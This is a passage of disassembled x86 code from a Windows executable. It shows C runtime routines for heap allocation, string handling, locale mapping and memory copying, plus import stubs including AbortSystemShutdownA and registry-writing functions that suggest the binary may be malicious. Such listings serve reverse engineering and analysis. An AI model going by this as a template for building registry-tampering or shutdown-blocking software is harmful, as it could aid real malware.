loc_404375: ; CODE XREF: sub_4040BE+1A4�j
test ecx, ecx
jz short loc_404384
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_404384
; ---------------------------------------------------------------------------
loc_404381: ; CODE XREF: sub_4040BE+229�j
mov ecx, [ebp+var_8]
loc_404384: ; CODE XREF: sub_4040BE+2B9�j
; sub_4040BE+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_4043BA
cmp ebx, dword_4070F4
jnz short loc_4043BA
mov ecx, [ebp+var_4]
cmp ecx, dword_4070EC
jnz short loc_4043BA
and dword_4070F4, 0
loc_4043BA: ; CODE XREF: sub_4040BE+2E0�j
; sub_4040BE+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_4043C2: ; CODE XREF: sub_4040BE+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_4040BE endp
; =============== S U B R O U T I N E =======================================
sub_4043C7 proc near ; CODE XREF: sub_4040BE+CC�p
mov eax, dword_4070F8
mov ecx, dword_4070E8
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_40440A
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax ; dwBytes
push lpMem ; lpMem
push edi ; dwFlags
push hHeap ; hHeap
call HeapReAlloc
cmp eax, edi
jz short loc_40445A
add dword_4070E8, 10h
mov lpMem, eax
mov eax, dword_4070F8
loc_40440A: ; CODE XREF: sub_4043C7+11�j
mov ecx, lpMem
push 41C4h ; dwBytes
push 8 ; dwFlags
lea eax, [eax+eax*4]
push hHeap ; hHeap
lea esi, [ecx+eax*4]
call HeapAlloc
cmp eax, edi
mov [esi+10h], eax
jz short loc_40445A
push 4 ; flProtect
push 2000h ; flAllocationType
push 100000h ; dwSize
push edi ; lpAddress
call VirtualAlloc ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_40445E
push dword ptr [esi+10h] ; lpMem
push edi ; dwFlags
push hHeap ; hHeap
call HeapFree
loc_40445A: ; CODE XREF: sub_4043C7+30�j
; sub_4043C7+67�j
xor eax, eax
jmp short loc_404475
; ---------------------------------------------------------------------------
loc_40445E: ; CODE XREF: sub_4043C7+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_4070F8
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_404475: ; CODE XREF: sub_4043C7+95�j
pop edi
pop esi
retn
sub_4043C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404478 proc near ; CODE XREF: sub_4040BE+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_40448A: ; CODE XREF: sub_404478+19�j
test eax, eax
jl short loc_404493
shl eax, 1
inc ebx
jmp short loc_40448A
; ---------------------------------------------------------------------------
loc_404493: ; CODE XREF: sub_404478+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_4044A8: ; CODE XREF: sub_404478+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_4044A8
mov edi, ebx
push 4 ; flProtect
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h ; flAllocationType
push 8000h ; dwSize
push edi ; lpAddress
call VirtualAlloc ; VirtualAlloc
test eax, eax
jnz short loc_4044DB
or eax, 0FFFFFFFFh
jmp loc_40456E
; ---------------------------------------------------------------------------
loc_4044DB: ; CODE XREF: sub_404478+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_404521
lea eax, [edi+10h]
loc_4044E8: ; CODE XREF: sub_404478+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_4044E8
loc_404521: ; CODE XREF: sub_404478+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_40455E
or [eax+4], edi
loc_40455E: ; CODE XREF: sub_404478+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_40456E: ; CODE XREF: sub_404478+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_404478 endp
; =============== S U B R O U T I N E =======================================
sub_404573 proc near ; CODE XREF: sub_4035C9+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_4070B0, ebx
push esi
push edi
jnz short loc_4045C2
push offset LibFileName ; "user32.dll"
call LoadLibraryA ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_4045F8
mov esi, GetProcAddress
push offset ProcName ; "MessageBoxA"
push edi ; hModule
call esi ; GetProcAddress
test eax, eax
mov dword_4070B0, eax
jz short loc_4045F8
push offset aGetactivewindo ; "GetActiveWindow"
push edi ; hModule
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi ; hModule
mov dword_4070B4, eax
call esi ; GetProcAddress
mov dword_4070B8, eax
loc_4045C2: ; CODE XREF: sub_404573+B�j
mov eax, dword_4070B4
test eax, eax
jz short loc_4045E1
call eax ; dword_4070B4
mov ebx, eax
test ebx, ebx
jz short loc_4045E1
mov eax, dword_4070B8
test eax, eax
jz short loc_4045E1
push ebx
call eax ; dword_4070B8
mov ebx, eax
loc_4045E1: ; CODE XREF: sub_404573+56�j
; sub_404573+5E�j ...
push [esp+0Ch+arg_8]
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push ebx
call dword_4070B0
loc_4045F4: ; CODE XREF: sub_404573+87�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4045F8: ; CODE XREF: sub_404573+1C�j
; sub_404573+33�j
xor eax, eax
jmp short loc_4045F4
sub_404573 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404600 proc near ; CODE XREF: sub_4035C9+C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404683
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404624
shr ecx, 2
jnz short loc_404691
jmp short loc_404645
; ---------------------------------------------------------------------------
loc_404624: ; CODE XREF: sub_404600+1B�j
; sub_404600+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404652
test al, al
jz short loc_40465A
test esi, 3
jnz short loc_404624
mov ebx, ecx
shr ecx, 2
jnz short loc_404691
loc_404640: ; CODE XREF: sub_404600+8F�j
and ebx, 3
jz short loc_404652
loc_404645: ; CODE XREF: sub_404600+22�j
; sub_404600+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40467E
dec ebx
jnz short loc_404645
loc_404652: ; CODE XREF: sub_404600+2B�j
; sub_404600+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40465A: ; CODE XREF: sub_404600+2F�j
test edi, 3
jz short loc_404674
loc_404662: ; CODE XREF: sub_404600+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4046F6
test edi, 3
jnz short loc_404662
loc_404674: ; CODE XREF: sub_404600+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4046E7
loc_40467B: ; CODE XREF: sub_404600+7F�j
; sub_404600+F4�j
mov [edi], al
inc edi
loc_40467E: ; CODE XREF: sub_404600+4D�j
dec ebx
jnz short loc_40467B
pop ebx
pop esi
loc_404683: ; CODE XREF: sub_404600+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404689: ; CODE XREF: sub_404600+A9�j
; sub_404600+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404640
loc_404691: ; CODE XREF: sub_404600+20�j
; sub_404600+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404689
test dl, dl
jz short loc_4046DB
test dh, dh
jz short loc_4046D1
test edx, 0FF0000h
jz short loc_4046C7
test edx, 0FF000000h
jnz short loc_404689
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046C7: ; CODE XREF: sub_404600+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_404600+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046DB: ; CODE XREF: sub_404600+AD�j
xor edx, edx
mov [edi], edx
loc_4046DF: ; CODE XREF: sub_404600+C5�j
; sub_404600+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4046F1
loc_4046E7: ; CODE XREF: sub_404600+79�j
xor eax, eax
loc_4046E9: ; CODE XREF: sub_404600+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4046E9
loc_4046F1: ; CODE XREF: sub_404600+E5�j
and ebx, 3
jnz short loc_40467B
loc_4046F6: ; CODE XREF: sub_404600+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_404600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4046FE(LCID Locale, DWORD dwMapFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPSTR lpDestStr, int cchDest, UINT CodePage, int)
sub_4046FE proc near ; CODE XREF: sub_403AE6+BE�p
; sub_403AE6+E6�p
var_28 = dword ptr -28h
lpSrcStr = dword ptr -24h
var_20 = dword ptr -20h
cchSrc = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
Locale = dword ptr 8
dwMapFlags = dword ptr 0Ch
lpMultiByteStr = dword ptr 10h
cbMultiByte = dword ptr 14h
lpDestStr = dword ptr 18h
cchDest = dword ptr 1Ch
CodePage = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405470
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_4070DC, edi
jnz short loc_404774
push edi ; cchDest
push edi ; lpDestStr
push 1
pop ebx
push ebx ; cchSrc
push offset SrcStr ; lpSrcStr
mov esi, 100h
push esi ; dwMapFlags
push edi ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_404752
mov dword_4070DC, ebx
jmp short loc_404774
; ---------------------------------------------------------------------------
loc_404752: ; CODE XREF: sub_4046FE+4A�j
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push offset byte_406F38 ; lpSrcStr
push esi ; dwMapFlags
push edi ; Locale
call LCMapStringA ; LCMapStringA
test eax, eax
jz loc_40488C
mov dword_4070DC, 2
loc_404774: ; CODE XREF: sub_4046FE+2E�j
; sub_4046FE+52�j
cmp [ebp+cbMultiByte], edi
jle short loc_404789
push [ebp+cbMultiByte]
push [ebp+lpMultiByteStr]
call sub_404922
pop ecx
pop ecx
mov [ebp+cbMultiByte], eax
loc_404789: ; CODE XREF: sub_4046FE+79�j
mov eax, dword_4070DC
cmp eax, 2
jnz short loc_4047B0
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringA ; LCMapStringA
jmp loc_40488E
; ---------------------------------------------------------------------------
loc_4047B0: ; CODE XREF: sub_4046FE+93�j
cmp eax, 1
jnz loc_40488C
cmp [ebp+CodePage], edi
jnz short loc_4047C6
mov eax, dword_4070D4
mov [ebp+CodePage], eax
loc_4047C6: ; CODE XREF: sub_4046FE+BE�j
push edi ; cchWideChar
push edi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov ebx, eax
mov [ebp+cchSrc], ebx
cmp ebx, edi
jz loc_40488C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+lpSrcStr], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404821
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+lpSrcStr], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+cchSrc]
loc_404821: ; CODE XREF: sub_4046FE+10E�j
cmp [ebp+lpSrcStr], edi
jz short loc_40488C
push ebx ; cchWideChar
push [ebp+lpSrcStr] ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
test eax, eax
jz short loc_40488C
push edi ; cchDest
push edi ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40488C
test byte ptr [ebp+dwMapFlags+1], 4
jz short loc_4048A0
cmp [ebp+cchDest], edi
jz loc_40491B
cmp esi, [ebp+cchDest]
jg short loc_40488C
push [ebp+cchDest] ; cchDest
push [ebp+lpDestStr] ; lpDestStr
push ebx ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jnz loc_40491B
loc_40488C: ; CODE XREF: sub_4046FE+66�j
; sub_4046FE+B5�j ...
xor eax, eax
loc_40488E: ; CODE XREF: sub_4046FE+AD�j
; sub_4046FE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4046FE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048D4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4048D4: ; CODE XREF: sub_4046FE+1C2�j
cmp ebx, edi
jz short loc_40488C
push esi ; cchDest
push ebx ; lpDestStr
push [ebp+cchSrc] ; cchSrc
push [ebp+lpSrcStr] ; lpSrcStr
push [ebp+dwMapFlags] ; dwMapFlags
push [ebp+Locale] ; Locale
call LCMapStringW ; LCMapStringW
test eax, eax
jz short loc_40488C
cmp [ebp+cchDest], edi
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
jnz short loc_4048FB
push edi
push edi
jmp short loc_404901
; ---------------------------------------------------------------------------
loc_4048FB: ; CODE XREF: sub_4046FE+1F7�j
push [ebp+cchDest] ; cbMultiByte
push [ebp+lpDestStr] ; lpMultiByteStr
loc_404901: ; CODE XREF: sub_4046FE+1FB�j
push esi ; cchWideChar
push ebx ; lpWideCharStr
push 220h ; dwFlags
push [ebp+CodePage] ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40488C
loc_40491B: ; CODE XREF: sub_4046FE+165�j
; sub_4046FE+188�j
mov eax, esi
jmp loc_40488E
sub_4046FE endp
; =============== S U B R O U T I N E =======================================
sub_404922 proc near ; CODE XREF: sub_4046FE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40493F
loc_404932: ; CODE XREF: sub_404922+1B�j
cmp byte ptr [eax], 0
jz short loc_40493F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404932
loc_40493F: ; CODE XREF: sub_404922+E�j
; sub_404922+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40494A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40494A: ; CODE XREF: sub_404922+21�j
mov eax, edx
retn
sub_404922 endp
; =============== S U B R O U T I N E =======================================
sub_40494D proc near ; CODE XREF: sub_403CC8+1F�p
arg_0 = dword ptr 4
mov eax, dword_4070E4
test eax, eax
jz short loc_404965
push [esp+arg_0]
call eax ; dword_4070E4
test eax, eax
pop ecx
jz short loc_404965
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_40494D+7�j
; sub_40494D+12�j
xor eax, eax
retn
sub_40494D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404970 proc near ; CODE XREF: sub_403D93+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404990
cmp edi, eax
jb loc_404B08
loc_404990: ; CODE XREF: sub_404970+16�j
test edi, 3
jnz short loc_4049AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
loc_4049AC: ; CODE XREF: sub_404970+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4049C4
and eax, 3
add ecx, eax
jmp dword ptr loc_4049CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4049C4: ; CODE XREF: sub_404970+46�j
jmp dword ptr loc_404AC8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4049CC: ; CODE XREF: sub_404970+31�j
; sub_404970+8E�j ...
jmp off_404A4C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4049E0
dd offset loc_404A0C
dd offset loc_404A30
; ---------------------------------------------------------------------------
loc_4049E0: ; DATA XREF: sub_404970+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A0C: ; DATA XREF: sub_404970+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404A30: ; DATA XREF: sub_404970+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404A4C dd offset loc_404AAF ; DATA XREF: sub_404970:loc_4049CC�r
dd offset loc_404A9C
dd offset loc_404A94
dd offset loc_404A8C
dd offset loc_404A84
dd offset loc_404A7C
dd offset loc_404A74
dd offset loc_404A6C
; ---------------------------------------------------------------------------
loc_404A6C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404A74: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404A7C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404A84: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404A8C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404A94: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404A9C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404AAF: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970:off_404A4C�o
jmp off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AB8 dd offset loc_404AC8 ; DATA XREF: sub_404970+35�r
; sub_404970+92�r ...
dd offset loc_404AD0
dd offset loc_404ADC
dd offset loc_404AF0
; ---------------------------------------------------------------------------
loc_404AC8: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404ADC: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AF0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B08: ; CODE XREF: sub_404970+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404B3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B30: ; CODE XREF: sub_404970+1B1�j
; sub_404970+208�j ...
neg ecx
jmp off_404C00[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B3C: ; CODE XREF: sub_404970+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404B54
and eax, 3
sub ecx, eax
jmp dword ptr loc_404B54+4[eax*4]
; ---------------------------------------------------------------------------
loc_404B54: ; CODE XREF: sub_404970+1D6�j
; DATA XREF: sub_404970+1DD�r
jmp off_404C50[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404B67+1
dd offset loc_404B88
; ---------------------------------------------------------------------------
mov al, 4Bh
inc eax
loc_404B67: ; DATA XREF: sub_404970+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B88: ; DATA XREF: sub_404970+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404B30
std
rep movsd
cld
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C04
dd offset loc_404C0C
dd offset loc_404C14
dd offset loc_404C1C
dd offset loc_404C24
dd offset loc_404C2C
dd offset loc_404C34
off_404C00 dd offset loc_404C47 ; DATA XREF: sub_404970+1C2�r
; ---------------------------------------------------------------------------
loc_404C04: ; DATA XREF: sub_404970+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404C0C: ; DATA XREF: sub_404970+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404C14: ; DATA XREF: sub_404970+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404C1C: ; DATA XREF: sub_404970+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404C24: ; DATA XREF: sub_404970+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404C2C: ; DATA XREF: sub_404970+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404C34: ; DATA XREF: sub_404970+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404C47: ; CODE XREF: sub_404970+1C2�j
; DATA XREF: sub_404970:off_404C00�o
jmp off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404C50 dd offset loc_404C60 ; DATA XREF: sub_404970+1B7�r
; sub_404970:loc_404B54�r ...
dd offset loc_404C68
dd offset loc_404C78
dd offset loc_404C8C
; ---------------------------------------------------------------------------
loc_404C60: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C68: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C8C: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404970 endp
; ---------------------------------------------------------------------------
align 2
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
align 400h
_text ends
;
; Imports from advapi32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall AbortSystemShutdownA(LPSTR lpMachineName)
extrn AbortSystemShutdownA:dword ; CODE XREF: sub_402029+9B�p
; DATA XREF: sub_402029+9B�r
; LSTATUS __stdcall RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult)
extrn RegOpenKeyA:dword ; CODE XREF: sub_4020D7+96�p
; DATA XREF: sub_4020D7+96�r
; LSTATUS __stdcall RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE *lpData, DWORD cbData)
extrn RegSetValueExA:dword ; CODE XREF: sub_4020D7+BE�p
; DATA XREF: sub_4020D7+BE�r
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_4020D7+C7�p
; DATA XREF: sub_4020D7+C7�r
;
; Imports from kernel32.dll
;
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_404573+12�p
; DATA XREF: sub_404573+12�r
extrn lstrcpy:dword ; CODE XREF: sub_4010D2+76�p
; sub_40127D+8F�p ...
; HFILE __stdcall lclose(HFILE hFile)
extrn _lclose:dword ; CODE XREF: sub_401210+63�p
; StartAddress+2AB�p
; DATA XREF: ...
